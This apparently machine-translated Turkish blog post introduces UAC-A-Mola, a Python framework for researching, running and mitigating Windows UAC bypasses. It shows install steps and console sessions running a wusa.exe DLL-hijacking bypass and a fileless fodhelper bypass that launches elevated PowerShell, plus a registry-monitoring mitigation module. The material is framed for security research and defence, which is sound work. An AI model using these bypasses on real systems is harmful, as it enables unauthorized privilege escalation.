UAC-A-Mola - Güvenlik Araştırmacılarının Bilinen Bypass'ları Algılama ve Kullanma Ekinde Yeni 

 19 DAYS AGO  08:29 ZİON3R

      

UAC-A-Mola, güvenlik araştırmacılarının bilinen bypassları tespit etmenin ve kullanmanın yanı sıra yeni UAC bypasslarını incelemelerine olanak sağlayan bir araçtır. UAC-A-mola, UAC bypasslarının korunmasını ve azaltılmasını sağlayacak modüllere sahiptir.

Uac-a-mola'nın güçlü noktası, diğer araştırmacıların UAC'deki yeni zayıf yönleri keşfetme çalışmalarını ve süreçlerini yürütebilecekleri şekilde yaratılmış olmalarıdır. Tabii ki, bu araç önceden soyma işlemlerinde ve ayrıca UAC bypasslı ekipmanı korumak ve numaralandırmak için BT ekipleri tarafından kullanılabilir.

Kurulum
uac-a-mola'yı kurmak için aşağıdaki işlemleri yapmanız gerekir:

1. Kendi altyapınızı hesaba katarak Windows için python 2.7.x'i indirip yükleyin , ikilileri burada bulabilirsiniz: https://www.python.org/downloads/
2. Python yolunu yol ortam değişkenine ekleyin . Bunu aşağıdaki adımları uygulayarak yapabilirsiniz:
   1. Sağ tıklama mycomputer ve özelliklerine sol tıklama
   2. Gelişmiş sistem konfigürasyonu için sol tıklama
   3. Çevre Değişkenleri için Lef tıklayın
   4. In sisteme değişkenleri , çift sol tıklayın kutu Path
   5. Yeni öğesine sol tıklamak , aşağıdaki yolları ekleyin:
      • C: \ Python27 \
      • C: \ Python27 \ script\
3. .Acip dosyasını indirerek ya da repo klonlayarak uac-a-mola aracını github'den indirin.
4. Uac-a-mola-master klasörünü bir cmd ile açın ve aşağıdaki komutu çalıştırın :

pip install -r requirements.txt

Uac-a-mola artık sallanmaya hazır! İşlevlerini yazarak test edebilirsiniz:

cd uacamola
python uacamola.py

Öğretici
Bu, bazı uac-a-mola modüllerinin kullanımını açıklayan kısa bir bölümdür:

Saldırı modülleri Saldırı modüllerini
kullanmak, açıklama gerektirmeyen çok basit bir şeydir. Yapmanız gereken tek şey ilgilikomutu load komutunukullanarak çerçeveye yüklemek , show komutunukullanarak seçenekleri veya giriş parametrelerini görebilirsiniz, run komutuyla modül çalıştırılır:

uac-a-mola> load .\modules\attack\dll_hijacking_wusa.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[dll_hijacking_wusa.py]> show

 Author
 ------
 |_Pablo Gonzalez (pablo@11paths or @pablogonzalezpe)

 Name
 ----
 |_Copy DLL with wusa.exe

 Description
 -----------
 |_It's used for copy a DLL in privilege path (wusa method win7/8/8.1)


 Options (Field = Value)
 -----------------------
 |_name_dll = comctl32.dll (name of DLL)
 |
 |_binary = compmgmtlauncher.exe (Path to the vulnerable binary)
 |
 |_malicious_dll = C:\Users\ieuser\Desktop\uac-a-mola\uacamola\payloads\comctl32\comctl32.dll (Path to a malicious dll)
 |
 |_name_folder = x86_microsoft.windows.common-controls_6595b641   44ccf1df_6.0.7601.17514_none_41e6975e2bd6f2 (Name folder)
 |
 |_destination_path = C:\Windows\System32 (Destination path)


uac-a-mola[dll_hijacking_wusa.py]> run
[+] Running module...
creating path...
SUCCESS: done
copying dll in path...
SUCCESS: done
creating DDF file...
SUCCESS: done
creating CAB file...
SUCCESS: done
launch wusa.exe /extract
SUCCESS: done! got root? :D
removing path...
SUCCESS: done
uac-a-mola[dll_hijacking_wusa.py]>

Ve diğer örnek:

uac-a-mola> load modules\attack\fileless_fodhelper.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[fileless_fodhelper.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_Fileless Fodhelper

 Description
 -----------
 |_Fileless - Fodhelper bypass UAC

 Options (Field = Value)
 -----------------------
 |_instruction = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C echo mola > c:\pwned.txt (Elevated Code)

uac-a-mola[fileless_fodhelper.py]> set instruction powershell.exe
uac-a-mola[fileless_fodhelper.py]> run
[+] Running module...

Hafifletme modülleri
Hafifletme yöntemlerini kullanmak da oldukça basittir, ancak bu bölümde açıklanacak biraz daha karmaşık bir iç yapıya sahiptirler. Kullanımıyla ilgili olarak, yapılması gereken ilk şey mevcut azaltma modülünü yüklemek.

uac-a-mola> load modules\mitigation\bypass_mitigation.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[bypass_mitigation.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_This module will instrument the binaries selected and detect possible UAC bypasses

 Description
 -----------
 |_Bypass Mitigation

 Options (Field = Value)
 -----------------------
 |_[REQUIRED] password = None (Password for connection)
 |
 |_[REQUIRED] binlist_file = None (File with a list of binaries to hook, one on each line)
 |
 |_port = 5555 (Port for connection)

Bu durumda, acentelerin uacamola çerçevesinde yürütülecek dinleyiciyle iletişim kurmak için kullanacakları bir şifre belirlememiz gerekecektir . Aracıları uacamola / support / agents yolunda bulabiliriz, bu dosyaları açarak şifreyi görebiliriz:

fodhelper_ag = Agent('fodhelper.exe', 'localhost', 5555, 'uacamola')
fodhelper_ag.send_forbidden("Software\\Classes\\ms-settings\\Shell\\Open\\command")

Uacamola kimlik doğrulama ve iletişim için kullanılan şifre olacaktır, ancak değiştirebiliriz. Gereken diğer parametre, izlenecek ikili dosyalar listesini içeren bir dosyanın yoludur, bu ikili dosyaların aracı yollarında bir agent.pyw dosyasına sahip olması gerekir.

uac-a-mola[bypass_mitigation.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_This module will instrument the binaries selected and detect possible UAC bypasses

 Description
 -----------
 |_Bypass Mitigation

 Options (Field = Value)
 -----------------------
 |_password = uacamola (Password for connection)
 |
 |_binlist_file = bins.txt (File with a list of binaries to hook, one on each line)
 |
 |_port = 5555 (Port for connection)

uac-a-mola[bypass_mitigation.py]> run
[+] Running module...
[+] Executing the listener...

--- Press ENTER for quit mitigate mode ---

Sadece bu alanları doldurup run komutunu çalıştırmak , uacamola listede görünen ikili dosyalarda UAC bypass ile ilgili tüm aktiviteyi izlemeye başlayacaktır. Tehlikeli aktivite tespit edildiğinde, otomatik olarak (dosya sistemi veya kayıt) tehlikeli dalı budamak edecek ve yürütecek ikili bir de güvenli bir şekilde. Bu moddan çıkmak için sadece de ENTER tuşuna basmamız gerekiyor .